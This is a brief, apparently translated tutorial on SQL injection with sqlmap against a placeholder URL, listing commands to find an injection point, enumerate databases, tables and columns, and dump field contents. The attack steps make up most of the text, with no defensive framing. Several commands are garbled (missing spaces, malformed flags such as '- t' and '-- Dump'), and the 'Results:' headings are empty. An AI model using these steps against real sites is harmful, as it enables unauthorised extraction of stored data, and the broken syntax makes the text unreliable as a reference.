1.Check injection point
"The injection point needs to be found on its own, with tools such as:Acunetix Web Vulnerability
Scanner (WVS), AppScan, etc. "u means URL.
Sqlmap-u http://www.XXXXX.com/a.asp?p=18
2.List Database Information
"Sqlmap will help us list all the names, including the database type"
Sqlmap-u www.XXXXX.com/a.asp?p=18--dbs
3.specifies that the database is listed in all tables
Sqlmap-u Www.XXXXX.com/a.asp?p=18-D database name --tables
Results:
4.lists all fields of the specified table for the specified database
Sqlmap-u Www.XXXXX.com/a.asp?p=18-D Data name - t table name --columns
5.outputs the contents of the specified field
Sqlmap-u www. xxxxx.com/a.asp?p=18-d Data name -T table name - c field 1, field 2-- Dump(output Some fields according to your needs)
Results:
---restore content ends---
SQL injection with the Sqlmap tool